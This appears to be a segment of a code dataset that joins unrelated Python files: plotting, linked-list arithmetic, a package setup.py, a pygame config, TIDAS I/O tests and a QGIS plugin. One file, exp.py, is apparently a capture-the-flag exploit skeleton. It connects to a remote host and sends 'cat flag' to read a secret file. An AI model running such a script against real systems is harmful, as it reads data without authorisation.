\"bx-\")\nplt.plot(np_res50[:,0], np_res50[:,1], \"cx-\")\nplt.plot(np_res25[:,0], np_res25[:,1], \"gx-\")\nplt.plot(np_res10[:,0], np_res10[:,1], \"mx-\")\n# plot tolerance values\nplt.plot([-50, -50], [-245, -145], \"bx-\")\nplt.plot([-30, -30], [-245, -195], \"cx-\")\nplt.plot([-10, -10], [-245, -220], \"gx-\")\nplt.plot([10, 10], [-245, -235], \"mx-\")\n\nplt.axis(\"equal\")\nplt.title(\"Python implementation of the Ramer-Douglas-Peucker algorithm\\n (https://pypi.python.org/pypi/rdp)\")\nplt.text(-70, -160, \"Tolerance Value\", rotation = 90)\nplot = plt.gca()\nplot.axes.get_xaxis().set_visible(False)\nplot.axes.get_yaxis().set_visible(False)\nplt.show()","sub_path":"visualization/douglasPeucker.py","file_name":"douglasPeucker.py","file_ext":"py","file_size_in_byte":1578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"607239257","text":"import random\n\nclass Node:\n def __init__(self, val):\n self.val = val\n self.next = None\n\nclass Sum:\n def __init__(self, carry, sumlist):\n self.carry = carry\n self.sumlist = sumlist\n\ndef add_rev(a, b, carry):\n if carry == 0:\n if a is None and b is None:\n return None\n\n if a is None:\n return b\n\n if b is None:\n return a\n\n if a is None:\n a = Node(0)\n if b is None:\n b = Node(0)\n \n calc = a.val + b.val + carry\n val = calc % 10\n carry = int(calc / 10)\n cur = Node(val)\n cur.next = add_rev(a.next, b.next, carry)\n return cur\n\ndef gen_int_llist(num):\n head = Node(random.randint(0, 9))\n prev = head\n for i in range(0, num):\n cur = Node(random.randint(0, 9))\n prev.next = cur\n prev = cur\n\n return head\n\ndef dump_num_rev(num_llist_rev):\n stack = []\n cur = num_llist_rev\n while cur is not None:\n stack.append(cur.val)\n cur = cur.next\n\n val = ''\n while len(stack) > 0:\n val += str(stack.pop())\n\n return val\n\ndef dump_num(num_llist):\n cur = num_llist\n val = ''\n while cur is not None:\n val += str(cur.val)\n cur = cur.next\n\n return val\n\ndef adjust_digit(a, b):\n a_nlen = b_nlen = 0\n\n cur = a\n while cur is not None:\n cur = cur.next\n a_nlen += 1\n cur = b\n while cur is not None:\n cur = cur.next\n b_nlen += 1\n\n ndigit = max(a_nlen, b_nlen)\n \n a_new = a\n if a_nlen != ndigit: \n head = Node(0)\n prev = head\n for i in range(a_nlen+1, ndigit):\n cur = Node(0)\n prev.next = cur\n prev = cur\n prev.next = a_new\n a_new = prev\n\n b_new = b\n if b_nlen != ndigit: \n head = Node(0)\n prev = head\n for i in range(b_nlen+1, ndigit):\n cur = Node(0)\n prev.next = cur\n prev = cur\n prev.next = b_new\n b_new = head\n \n return (a_new, b_new)\n\ndef sum_sub(a, b):\n if a is None and b is None:\n return Sum(0, None)\n\n sub_sum = sum_sub(a.next, b.next)\n sum_total = a.val + b.val + sub_sum.carry \n sum_val = Node(sum_total % 10)\n sum_carry = int(sum_total / 10)\n sum_val.next = sub_sum.sumlist\n \n return Sum(sum_carry, sum_val)\n\ndef add(a, b, carry):\n a, b = adjust_digit(a, b)\n\n #print(dump_num(a))\n #print(dump_num(b))\n\n total_sum = sum_sub(a, b)\n total_head = total_sum.sumlist\n if total_sum.carry > 0:\n carry_node = Node(1)\n carry_node.next = total_head\n total_head = carry_node\n\n return total_head \n\ndef doit():\n tests = [\n (gen_int_llist(10), gen_int_llist(10)),\n (gen_int_llist(10), gen_int_llist(8)),\n (gen_int_llist(10), gen_int_llist(1)),\n ]\n for t in tests:\n print('adding {} and {}'.format(\n dump_num(t[0]), dump_num(t[1])))\n print(dump_num(add(t[0], t[1], 0)))\n \ndef doit_rev():\n tests = [\n (gen_int_llist(10), gen_int_llist(10)),\n (gen_int_llist(10), gen_int_llist(8)),\n (gen_int_llist(10), gen_int_llist(1)),\n ]\n for t in tests:\n print('adding {} and {}'.format(\n dump_num_rev(t[0]), dump_num_rev(t[1])))\n print(dump_num_rev(add_rev(t[0], t[1], 0)))\n\nprint('--------------------')\nprint('adding two digits in first->tenth->hundredth->..')\ndoit_rev()\nprint('--------------------')\nprint('adding two digits in ..->hundredth->tenth->first')\ndoit()\n","sub_path":"2/5.py","file_name":"5.py","file_ext":"py","file_size_in_byte":3536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"277444235","text":"# Copyright (C) 2020 Istituto Italiano di Tecnologia (IIT). All rights reserved.\n# This software may be modified and distributed under the terms of the\n# GNU Lesser General Public License v2.1 or any later version.\n\nimport os\nimport shutil\nimport platform\nfrom setuptools.command.build_ext import build_ext\nfrom setuptools import setup, find_packages, Extension\n\n\nclass CopyMeshes(Extension):\n extension_name = \"CopyMeshes\"\n\n def __init__(self):\n Extension.__init__(self, name=self.extension_name, sources=[])\n\n\nclass BuildExtension(build_ext):\n \"\"\"\n Setuptools build extension handler.\n It processes all the extensions listed in the 'ext_modules' entry.\n \"\"\"\n\n # Name of the python package (the name used to import the module)\n PACKAGE_NAME = \"gym_ignition_models\"\n\n # Shared mesh directory\n SHARED_MESH_DIR = \"meshes\"\n\n # Dict that defines the folders to copy during the build process\n FROM_ORIG_TO_DEST = {\n f\"{SHARED_MESH_DIR}/iCubGazeboV2_5\": \"iCubGazeboV2_5/meshes\",\n f\"{SHARED_MESH_DIR}/iCubGazeboV2_5\": \"iCubGazeboSimpleCollisionsV2_5/meshes\",\n }\n\n def run(self) -> None:\n if len(self.extensions) != 1 or not isinstance(self.extensions[0], CopyMeshes):\n raise RuntimeError(\"This class can only build one CopyMeshes object\")\n\n if platform.system() != \"Linux\":\n raise RuntimeError(\"Only Linux is currently supported\")\n\n for ext in self.extensions:\n self.build_extension(ext)\n\n def build_extension(self, ext) -> None:\n if ext.name != CopyMeshes.extension_name:\n print(f\"Skipping unsupported extension '{ext.name}'\")\n return\n\n if self.inplace:\n raise RuntimeError(\"Editable mode is not supported by this project\")\n\n # Get the temporary external build directory\n ext_dir = os.path.abspath(os.path.dirname(self.get_ext_fullpath(ext.name)))\n\n # Package directory\n pkg_dir = os.path.join(ext_dir, self.PACKAGE_NAME)\n\n # Check that the directory exists\n if not os.path.isdir(pkg_dir):\n raise RuntimeError(f\"The build package directory '{pkg_dir}' does not exist\")\n\n # Copy the folders\n for orig, dest in self.FROM_ORIG_TO_DEST.items():\n orig_folder = os.path.join(pkg_dir, orig)\n dest_folder = os.path.join(pkg_dir, dest)\n\n if not os.path.isdir(orig_folder):\n raise RuntimeError(f\"Folder '{orig_folder}' does not exist\")\n\n if os.path.isdir(dest_folder):\n shutil.rmtree(dest_folder)\n\n shutil.copytree(orig_folder, dest_folder)\n\n # Remove the shared mesh folder\n shutil.rmtree(os.path.join(pkg_dir, self.SHARED_MESH_DIR))\n\n\n# Read the contents of your README file\nthis_directory = os.path.abspath(os.path.dirname(__file__))\nwith open(os.path.join(this_directory, 'README.md'), encoding='utf-8') as f:\n long_description = f.read()\n\nsetup(\n name=\"gym-ignition-models\",\n author=\"Diego Ferigo\",\n author_email=\"diego.ferigo@iit.it\",\n description=\"Additional robot models for RL simulations\",\n long_description=long_description,\n long_description_content_type='text/markdown',\n license=\"LGPL\",\n platforms='any',\n classifiers=[\n \"Development Status :: 4 - Beta\",\n \"Operating System :: POSIX :: Linux\",\n \"Topic :: Games/Entertainment :: Simulation\",\n \"Topic :: Scientific/Engineering :: Artificial Intelligence\",\n \"Framework :: Robot Framework\",\n \"Intended Audience :: Developers\",\n \"Intended Audience :: Science/Research\",\n \"Programming Language :: Python :: 3.6\",\n \"Programming Language :: Python :: 3 :: Only\",\n \"License :: OSI Approved :: GNU Lesser General Public License v2 or later (LGPLv2+)\",\n ],\n use_scm_version={\n 'local_scheme': 'dirty-tag',\n },\n setup_requires=['setuptools_scm'],\n python_requires='>=3.6',\n keywords=\"robot model robotics humanoid simulation urdf sdf icub\",\n packages=find_packages(),\n package_data={'gym_ignition_models': [\n 'meshes/*.*',\n 'meshes/**/*.*',\n 'meshes/**/**/*.*',\n '*/meshes/*.*',\n '*/meshes/**/*.*',\n '*/meshes/**/**/*.*',\n '*/*.sdf',\n '*/*.urdf',\n '*/model.config',\n ]},\n ext_modules=[CopyMeshes()],\n cmdclass={\n 'build_ext': BuildExtension,\n },\n url=\"https://github.com/dic-iit/gym-ignition-models\",\n)\n","sub_path":"pypi_install_script/gym-ignition-models-0.1.dev74.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":4488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"557511189","text":"#!/usr/bin/env python\n# coding=utf-8\nfrom pwn import*\nimport adlog\nimport ConfigParser\nconf = ConfigParser.ConfigParser()\nconf.read(\"config.ini\")\nport = conf.get('config', 'process_port')\n##################### load config ###############\n\n\ndef exp(ip, port): # don't add interactive in last script\n n = remote(ip, port)\n\n # you exp\n return readflag(n, \"cat flag\")\n\n\ndef readflag(n, payload):\n n.sendline(payload)\n flag = n.recvline()\n n.close()\n return flag\n# The flag have '\\n' Please remove '\\n' it when you submit it.\n","sub_path":"exp.py","file_name":"exp.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"353065184","text":"import pygame\npygame.init()\nimport math\nfrom pygame import mixer\n\n# creating the screen\nscreen=pygame.display.set_mode((1700,1000))\n\n# Title and icon\npygame.display.set_caption(\"River Crossing Challenge\")\nicon=pygame.image.load('logo.png')\npygame.display.set_icon(icon)\n\n#Setting up clock variable\nclock = pygame.time.Clock()\nfont = pygame.font.Font('freesansbold.ttf',25)\nframe_count = 0\nframe_rate = 60\n\n#Background Sound\nmixer.music.load('bensound-energy-1.mp3')\nmixer.music.play(-1)\n\n#Player\nplayerImg = pygame.image.load('diver.png')\nplayerX = 825\nplayerY = 1000\nplayerX_change = 0 \nplayerY_change = 0\n\n#creating all the dynamic enemies\nenemyImg=pygame.image.load('enemy.png')\ncrocodileImg=pygame.image.load('shark.png')\nstartImg=pygame.image.load('start.png')\nendImg=pygame.image.load('end.png')\nobsImg=pygame.image.load('skull.png')\n\n#Enemy1\nenemy1X = 0\nenemy1Y = 70\nenemy1X_change = 2\nenemy1Y_change = 0\n\n#Enemy2\nenemy2X = 860\nenemy2Y = 110\nenemy2X_change = 2\nenemy2Y_change = 0\n\n#Enemy3\nenemy3X = 0\nenemy3Y = 250\nenemy3X_change = 2.2\nenemy3Y_change = 0\n\n#Enemy4\nenemy4X = 1700\nenemy4Y = 310\nenemy4X_change = 2.2\nenemy4Y_change = 0\n\n#Crocodile1\ncroc1X = 1700\ncroc1Y = 500\ncroc1X_change = 1\ncroc1Y_change = 0\n\n#Enemy5\nenemy5X = 0\nenemy5Y = 450\nenemy5X_change = 1\nenemy5Y_change = 0\n \n#Enemy6\nenemy6X = 0 \nenemy6Y = 660\nenemy6X_change = 2.5\nenemy6Y_change = 0\n\n#Crocodile2\ncroc2X = 1700\ncroc2Y = 870\ncroc2X_change = 2\ncroc2Y_change = 0\n\n#Static Obstacles\n\n#obs1\nobs1X=625\nobs1Y=-3\n\n#obs2\nobs2X=825+200\nobs2Y=-3\n\n#obs3\nobs3X=525\nobs3Y=-3+194\n\n#obs4\nobs4X=1125\nobs4Y=-3+194\n\n#obs5\nobs5X=125\nobs5Y=-3+194*2\n\n#obs6\nobs6X=825\nobs6Y=-3+194*2\n\n#obs7\nobs7X=1525\nobs7Y=-3+194*2\n\n#obs8\nobs8X=425\nobs8Y=-3+194*3\n\n#obs9\nobs9X=1225\nobs9Y=-3+194*3\n\n#obs10\nobs10X=125\nobs10Y=-3+194*4\n\n#obs11\nobs11X=825\nobs11Y=-3+194*4\n\n#obs12\nobs12X=1525\nobs12Y=-3+194*4\n\n#Score\nscore_value = 0\nfont = pygame.font.Font('freesansbold.ttf',32)\ntext1X = 10\ntext1Y = 10\ntext2X=10\ntext2Y=60\ni=0\nj=0\np=0\nq=0\n\n#Time\nminutes1=0\nseconds1=0\nminutes2=0\nseconds2=0\n\n\n\n","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"531971627","text":"# Copyright (c) 2015-2017 by the parties listed in the AUTHORS file.\n# All rights reserved. Use of this source code is governed by \n# a BSD-style license that can be found in the LICENSE file.\n\nfrom ..mpi import MPI\nfrom .mpi import MPITestCase\n\nimport sys\nimport os\nimport re\nimport shutil\n\nimport unittest\n\nimport numpy as np\nimport numpy.testing as nt\n\nfrom ..dist import *\n\nfrom .. import qarray as qa\n\nfrom ..tod import tidas_available\nfrom ..tod import Interval\n\nif tidas_available:\n from tidas.mpi_volume import MPIVolume\n from ..tod import tidas as tt\n\n\nclass TidasTest(MPITestCase):\n\n def setUp(self):\n self.outdir = \"toast_test_output\"\n if self.comm.rank == 0:\n if not os.path.isdir(self.outdir):\n os.mkdir(self.outdir)\n self.outvol = os.path.join(self.outdir, \"test_tidas\")\n self.export = os.path.join(self.outdir, \"export_tidas\")\n self.rate = 20.0\n\n # Properties of the observations\n self.nobs = 6\n self.obslen = 3600.0\n self.obsgap = 600.0\n\n self.obstotalsamp = int(0.5 + (self.obslen + self.obsgap) \n * self.rate) + 1\n self.obssamp = int(0.5 + self.obslen * self.rate) + 1\n self.obsgapsamp = self.obstotalsamp - self.obssamp\n\n self.obstotal = (self.obstotalsamp - 1) / self.rate\n self.obslen = (self.obssamp - 1) / self.rate\n self.obsgap = (self.obsgapsamp - 1) / self.rate\n \n # Properties of the intervals within an observation\n self.nsub = 5\n self.subtotsamp = self.obssamp // self.nsub\n self.subgapsamp = 0\n self.subsamp = self.subtotsamp - self.subgapsamp\n\n # Detectors\n self.dets = [\n \"d100-1a\",\n \"d100-1b\",\n \"d145-2a\",\n \"d145-2b\",\n \"d220-3a\",\n \"d220-3b\"\n ]\n\n self.detquats = {}\n for d in self.dets:\n self.detquats[d] = np.array([0,0,0,1], dtype=np.float64)\n\n # Skip the rest of the setup if we don't have tidas.\n if not tidas_available:\n return\n\n # Group schema\n self.schm = tt.create_tidas_schema(self.dets, \"float64\", \"volts\")\n\n\n def tearDown(self):\n pass\n \n\n def meta_setup(self):\n ret = {}\n ret[\"string\"] = \"blahblahblah\"\n ret[\"double\"] = -123456789.0123\n ret[\"float\"] = -123456789.0123\n ret[\"int8\"] = -100\n ret[\"uint8\"] = 100\n ret[\"int16\"] = -10000\n ret[\"uint16\"] = 10000\n ret[\"int32\"] = -1000000000\n ret[\"uint32\"] = 1000000000\n ret[\"int64\"] = -100000000000\n ret[\"uint64\"] = 100000000000\n return ret\n\n\n def meta_verify(self, dct):\n nt.assert_equal(dct[\"string\"], \"blahblahblah\")\n nt.assert_equal(dct[\"int8\"], -100)\n nt.assert_equal(dct[\"uint8\"], 100)\n nt.assert_equal(dct[\"int16\"], -10000)\n nt.assert_equal(dct[\"uint16\"], 10000)\n nt.assert_equal(dct[\"int32\"], -1000000000)\n nt.assert_equal(dct[\"uint32\"], 1000000000)\n nt.assert_equal(dct[\"int64\"], -100000000000)\n nt.assert_equal(dct[\"uint64\"], 100000000000)\n nt.assert_almost_equal(dct[\"float\"], -123456789.0123)\n nt.assert_almost_equal(dct[\"double\"], -123456789.0123)\n return\n\n\n def create_intervals(self, start, first):\n ret = []\n for i in range(self.nsub):\n ifirst = i * self.subtotsamp\n if i == self.nsub - 1:\n ilast = self.obssamp - 1\n else:\n ilast = (i+1) * self.subtotsamp - 1\n istart = float(ifirst) / self.rate\n istop = float(ilast) / self.rate\n ret.append(Interval(\n start=(start + istart),\n stop=(start + istop), \n first=(first + ifirst), \n last=(first + ilast)))\n return ret\n\n\n def intervals_init(self, start, first):\n return self.create_intervals(start, first)\n\n\n def intervals_verify(self, ilist, start, first):\n reg = self.create_intervals(start, first)\n nt.assert_equal(len(ilist), len(reg))\n for i in range(len(ilist)):\n nt.assert_almost_equal(ilist[i].start, reg[i].start)\n nt.assert_equal(ilist[i].first, reg[i].first)\n return\n\n\n def create_bore(self, total, local):\n theta_incr = (0.5*np.pi) / (total - 1)\n phi_incr = (2.0*np.pi) / (total - 1)\n\n theta_start = local[0] * theta_incr\n phi_start = local[0] * phi_incr\n\n theta_stop = theta_start + (local[1] - 1) * theta_incr\n phi_stop = phi_start + (local[1] - 1) * phi_incr\n\n theta = np.linspace(theta_start, theta_stop, num=local[1], \n endpoint=True, dtype=np.float64)\n phi = np.linspace(phi_start, phi_stop, num=local[1], \n endpoint=True, dtype=np.float64)\n pa = np.zeros(local[1], dtype=np.float64)\n\n return qa.from_angles(theta, phi, pa)\n\n\n def obs_init(self, vol, parent, name, start, first):\n\n # fake metadata\n props = self.meta_setup()\n props = tt.encode_tidas_quats(self.detquats, props=props)\n\n # create intervals\n ilist = self.intervals_init(start, 0)\n\n # create the observation within the TIDAS volume\n\n obs = tt.create_tidas_obs(vol, parent, name, \n groups={\n \"detectors\" : (self.schm, self.obssamp, props)\n }, \n intervals={\n \"chunks\" : (len(ilist), dict())\n })\n\n # write the intervals that will be used for data distribution\n if vol.comm.rank == 0:\n obs.intervals_get(\"chunks\").write(ilist)\n\n # instantiate a TOD for this observation\n\n tod = tt.TODTidas(vol.comm, vol, \"{}/{}\".format(parent, name), \n detgroup=\"detectors\", distintervals=\"chunks\")\n\n # Now write the data. For this test, we simple write the detector\n # index (as a float) to the detector timestream. We also flag every\n # other sample. For the boresight pointing, we create a fake spiral\n # pattern.\n\n if vol.comm.rank == 0:\n # number of samples\n n = tod.total_samples\n\n # Write some simple timestamps\n incr = 1.0 / self.rate\n stamps = np.arange(n, dtype=np.float64)\n stamps *= incr\n stamps += start\n\n tod.write_times(stamps=stamps)\n\n # boresight\n boresight = self.create_bore(n, (0,n))\n tod.write_boresight(data=boresight)\n\n # flags. We use this for both the common and all the detector\n # flags just to check write/read roundtrip.\n flags = np.zeros(n, dtype=np.uint8)\n flags[::2] = 1\n\n tod.write_common_flags(flags=flags)\n\n # detector data\n fakedata = np.empty(n, dtype=np.float64)\n for d in tod.detectors:\n # get unique detector index and convert to float\n indx = float(tod.detindx[d])\n # write this to all local elements\n fakedata[:] = indx\n tod.write(detector=d, data=fakedata)\n # write detector flags\n tod.write_det_flags(detector=d, flags=flags)\n\n # FIXME: consider doing this in parallel once either TIDAS supports\n # that or there is a toast-specific workaround to serialize I/O to a\n # single HDF5 file.\n #\n # # number of local samples\n # nlocal = tod.local_samples[1]\n\n # # Write some simple timestamps\n # stamps = np.arange(nlocal, dtype=np.float64)\n # stamps /= self.rate\n # stamps += start + (tod.local_samples[0] / self.rate)\n\n # tod.write_times(stamps=stamps)\n\n # # boresight\n # boresight = self.create_bore(tod.total_samples, tod.local_samples)\n # tod.write_boresight(boresight)\n\n # # flags. We use this for both the common and all the detector\n # # flags just to check write/read roundtrip.\n # flags = np.zeros(nlocal, dtype=np.uint8)\n # flags[::2] = 1\n\n # tod.write_common_flags(flags=flags)\n\n # # detector data\n # fakedata = np.empty(nlocal, dtype=np.float64)\n # for d in range(len(self.dets)):\n # # get unique detector index and convert to float\n # indx = float(tod.detindx[d])\n # # write this to all local elements\n # fakedata[:] = indx\n # tod.write(detector=self.dets[d], data=fakedata)\n # # write detector flags\n # tod.write_det_flags(detector=self.dets[d], flags=flags)\n\n return\n\n\n def obs_verify(self, tod, start, first):\n nlocal = tod.local_samples[1]\n odd = False\n if tod.local_samples[0] % 2 != 0:\n odd = True\n\n # Read the intervals and compare\n\n intr = tod.block.intervals_get(\"chunks\")\n ilist = intr.read()\n self.intervals_verify(ilist, start, 0)\n\n # Verify group properties\n\n self.meta_verify(tod.group.props)\n\n # Read and compare timestamps\n\n compstamps = np.arange(nlocal, dtype=np.float64)\n compstamps /= self.rate\n compstamps += start + (tod.local_samples[0] / self.rate)\n\n stamps = tod.read_times()\n\n nt.assert_almost_equal(stamps, compstamps)\n\n # Read and compare boresight\n\n compbore = self.create_bore(tod.total_samples, tod.local_samples)\n boresight = tod.read_boresight()\n\n nt.assert_almost_equal(boresight, compbore)\n\n # flags. We use this for both the common and all the detector\n # flags just to check write/read roundtrip.\n\n compflags = np.zeros(nlocal, dtype=np.uint8)\n if odd:\n compflags[1::2] = 1\n else:\n compflags[::2] = 1\n\n flags = tod.read_common_flags()\n\n nt.assert_equal(flags, compflags)\n\n # detector data\n\n compdata = np.empty(nlocal, dtype=np.float64)\n for d in tod.local_dets:\n # get unique detector index and convert to float\n indx = float(tod.detindx[d])\n # comparison values\n compdata[:] = indx\n # read and check\n data = tod.read(detector=d)\n nt.assert_almost_equal(data, compdata)\n # check detector flags\n flags, cflags = tod.read_flags(detector=d)\n nt.assert_equal(flags, compflags)\n\n return\n\n\n def volume_init(self, path):\n if self.comm.rank == 0:\n if os.path.isdir(path):\n shutil.rmtree(path)\n self.comm.barrier()\n\n with MPIVolume(self.comm, path, backend=\"hdf5\", comp=\"none\") as vol:\n # Usually for real data we will have a hierarchy of blocks \n # (year, month, season, etc). For this test we just add generic\n # observations to the root block.\n for ob in range(self.nobs):\n obsname = \"obs_{:02d}\".format(ob)\n start = ob * self.obstotal\n first = ob * self.obstotalsamp\n self.obs_init(vol, \"\", obsname, start, first)\n return\n\n \n def volume_verify(self, path):\n with MPIVolume(self.comm, path) as vol:\n root = vol.root()\n for ob in range(self.nobs):\n obsname = \"obs_{:02d}\".format(ob)\n obs = root.block_get(obsname)\n start = ob * self.obstotal\n first = ob * self.obstotalsamp\n tod = tt.TODTidas(self.comm, vol, \"/{}\".format(obsname), \n detgroup=\"detectors\", distintervals=\"chunks\")\n self.obs_verify(tod, start, first)\n return\n\n\n @unittest.skipIf(not tidas_available, \"TIDAS not found\")\n def test_io(self):\n start = MPI.Wtime()\n\n self.volume_init(self.outvol)\n self.volume_verify(self.outvol)\n\n stop = MPI.Wtime()\n elapsed = stop - start\n #print(\"Proc {}: test took {:.4f} s\".format( MPI.COMM_WORLD.rank, elapsed ))\n\n\n @unittest.skipIf(not tidas_available, \"TIDAS not found\")\n def test_export(self):\n start = MPI.Wtime()\n\n self.volume_init(self.outvol)\n\n worldsize = self.comm.size\n if (worldsize >= 2):\n groupsize = int( worldsize / 2 )\n ngroup = 2\n else:\n groupsize = 1\n ngroup = 1\n toastcomm = Comm(self.comm, groupsize=groupsize)\n\n distdata = tt.load_tidas(toastcomm, self.outvol, mode=\"r\",\n distintervals=\"chunks\")\n\n if self.comm.rank == 0:\n if os.path.isdir(self.export):\n shutil.rmtree(self.export)\n self.comm.barrier()\n\n dumper = tt.OpTidasExport(self.export, usedist=True)\n dumper.exec(distdata)\n\n self.volume_verify(self.export)\n\n stop = MPI.Wtime()\n elapsed = stop - start\n #print(\"Proc {}: test took {:.4f} s\".format( MPI.COMM_WORLD.rank, elapsed ))\n\n","sub_path":"src/python/tests/tidas.py","file_name":"tidas.py","file_ext":"py","file_size_in_byte":13006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"652929630","text":"# -*- coding: utf-8 -*-\n\"\"\"\n/***************************************************************************\n SMC\n A QGIS plugin\n This plugin selects every feature inside the current extent\n Generated by Plugin Builder: http://g-sherman.github.io/Qgis-Plugin-Builder/\n -------------------\n begin : 2020-07-17\n git sha : $Format:%H$\n copyright : (C) 2020 by Infogeo54\n email : hvitoux@departement54.fr\n ***************************************************************************/\n\n/***************************************************************************\n * *\n * This program is free software; you can redistribute it and/or modify *\n * it under the terms of the GNU General Public License as published by *\n * the Free Software Foundation; either version 2 of the License, or *\n * (at your option) any later version. *\n * *\n ***************************************************************************/\n\"\"\"\nfrom qgis.PyQt.QtCore import QSettings, QTranslator, QCoreApplication, Qt\nfrom qgis.PyQt.QtGui import QIcon\nfrom qgis.PyQt.QtWidgets import QAction, QApplication\nfrom qgis.core import QgsProject, QgsFeatureRequest, QgsVectorLayer\n\n# Initialize Qt resources from file resources.py\nfrom .resources import *\n# Import the code for the dialog\nfrom .smc_dialog import SMCDialog\nfrom .utils import ui\nimport os.path\n\n\nclass SMC:\n \"\"\"QGIS Plugin Implementation.\"\"\"\n\n def __init__(self, iface):\n \"\"\"Constructor.\n\n :param iface: An interface instance that will be passed to this class\n which provides the hook by which you can manipulate the QGIS\n application at run time.\n :type iface: QgsInterface\n \"\"\"\n # Save reference to the QGIS interface\n self.iface = iface\n # initialize plugin directory\n self.plugin_dir = os.path.dirname(__file__)\n # initialize locale\n locale = QSettings().value('locale/userLocale')[0:2]\n locale_path = os.path.join(\n self.plugin_dir,\n 'i18n',\n 'SMC_{}.qm'.format(locale))\n\n if os.path.exists(locale_path):\n self.translator = QTranslator()\n self.translator.load(locale_path)\n QCoreApplication.installTranslator(self.translator)\n\n # Declare instance attributes\n self.actions = []\n self.menu = self.tr(u'&SMC')\n\n # Check if plugin was started the first time in current QGIS session\n # Must be set in initGui() to survive plugin reloads\n self.first_start = None\n\n # noinspection PyMethodMayBeStatic\n def tr(self, message):\n \"\"\"Get the translation for a string using Qt translation API.\n\n We implement this ourselves since we do not inherit QObject.\n\n :param message: String for translation.\n :type message: str, QString\n\n :returns: Translated version of message.\n :rtype: QString\n \"\"\"\n # noinspection PyTypeChecker,PyArgumentList,PyCallByClass\n return QCoreApplication.translate('SMC', message)\n\n\n def add_action(\n self,\n icon_path,\n text,\n callback,\n enabled_flag=True,\n add_to_menu=True,\n add_to_toolbar=True,\n status_tip=None,\n whats_this=None,\n parent=None):\n \"\"\"Add a toolbar icon to the toolbar.\n\n :param icon_path: Path to the icon for this action. Can be a resource\n path (e.g. ':/plugins/foo/bar.png') or a normal file system path.\n :type icon_path: str\n\n :param text: Text that should be shown in menu items for this action.\n :type text: str\n\n :param callback: Function to be called when the action is triggered.\n :type callback: function\n\n :param enabled_flag: A flag indicating if the action should be enabled\n by default. Defaults to True.\n :type enabled_flag: bool\n\n :param add_to_menu: Flag indicating whether the action should also\n be added to the menu. Defaults to True.\n :type add_to_menu: bool\n\n :param add_to_toolbar: Flag indicating whether the action should also\n be added to the toolbar. Defaults to True.\n :type add_to_toolbar: bool\n\n :param status_tip: Optional text to show in a popup when mouse pointer\n hovers over the action.\n :type status_tip: str\n\n :param parent: Parent widget for the new action. Defaults None.\n :type parent: QWidget\n\n :param whats_this: Optional text to show in the status bar when the\n mouse pointer hovers over the action.\n\n :returns: The action that was created. Note that the action is also\n added to self.actions list.\n :rtype: QAction\n \"\"\"\n\n icon = QIcon(icon_path)\n action = QAction(icon, text, parent)\n action.triggered.connect(callback)\n action.setEnabled(enabled_flag)\n\n if status_tip is not None:\n action.setStatusTip(status_tip)\n\n if whats_this is not None:\n action.setWhatsThis(whats_this)\n\n if add_to_toolbar:\n # Adds plugin icon to Plugins toolbar\n self.iface.addToolBarIcon(action)\n\n if add_to_menu:\n self.iface.addPluginToMenu(\n self.menu,\n action)\n\n self.actions.append(action)\n\n return action\n\n def initGui(self):\n \"\"\"Create the menu entries and toolbar icons inside the QGIS GUI.\"\"\"\n\n icon_path = ':/plugins/smc/icon.png'\n self.add_action(\n icon_path,\n text=self.tr(u'SMC'),\n callback=self.run,\n parent=self.iface.mainWindow())\n\n # will be set False in run()\n self.first_start = True\n\n\n def unload(self):\n \"\"\"Removes the plugin menu item and icon from QGIS GUI.\"\"\"\n for action in self.actions:\n self.iface.removePluginMenu(\n self.tr(u'&SMC'),\n action)\n self.iface.removeToolBarIcon(action)\n\n def fill_table(self, communes):\n \"\"\"\n Fill the \"Communes\" table\n :param communes: List - Communes to insert in the table\n \"\"\"\n rows, table = sorted(ui.create_rows(communes), key=lambda k: k[\"label\"]), self.dlg.tw_communes\n table.setRowCount(len(rows))\n for index, row in enumerate(rows):\n table.setItem(index, 0, row[\"label\"])\n table.setItem(index, 1, row[\"checkbox\"])\n\n def selected_communes_names(self):\n \"\"\"\n Returns selected \"Communes\" names\n :return: List - Selected \"Communes\" names\n \"\"\"\n res, table = [], self.dlg.tw_communes\n for row in range(table.rowCount()):\n is_selected = table.item(row, 1).checkState() == Qt.Checked\n if is_selected:\n res.append(table.item(row, 0).text())\n return res\n\n def selected_communes(self, communes):\n \"\"\"\n Returns the Feature instance of every selected \"Commune\"\n :param communes: QgsVectorLayer - The \"Communes\" layer\n :return: List - The Feature instance list for every selected \"Commune\"\n \"\"\"\n selected_communes_names = self.selected_communes_names()\n return [c for c in list(communes.getFeatures()) if c.attribute(\"nom\") in selected_communes_names]\n\n def select(self, communes):\n \"\"\"\n Performs the feature selection\n :param communes: QgsVectorLayer - The \"Communes\" layer\n \"\"\"\n QApplication.setOverrideCursor(Qt.WaitCursor)\n layers = [l for l in QgsProject.instance().mapLayers().values() if l.type() == 0 and l.name() != \"Communes\"]\n if self.dlg.cb_exclude.checkState() == Qt.Checked:\n root = QgsProject.instance().layerTreeRoot()\n basemaps_nodes = root.findGroup(\"Fonds de plan\").findLayers()\n basemaps_layers = [node.layer() for node in basemaps_nodes]\n layers = [l for l in QgsProject.instance().mapLayers().values() if l.type() == 0 and l not in basemaps_layers]\n for l in layers:\n for c in self.selected_communes(communes):\n expression = \"within($geometry, geom_from_wkt('{wkt}'))\".format(wkt=c.geometry().asWkt())\n l.selectByExpression(expression, 1)\n QApplication.restoreOverrideCursor()\n self.dlg.close()\n\n def run(self):\n \"\"\"Run method that performs all the real work\"\"\"\n\n extent = self.iface.mapCanvas().extent()\n communes = next((l for l in QgsProject.instance().mapLayersByName(\"Communes\")))\n visible_communes = communes.getFeatures(QgsFeatureRequest(extent))\n\n if self.first_start:\n self.first_start = False\n self.dlg = SMCDialog()\n\n # Event listeners\n self.dlg.btn_cancel.clicked.connect(self.dlg.close)\n self.dlg.btn_validate.clicked.connect(lambda: self.select(communes))\n\n 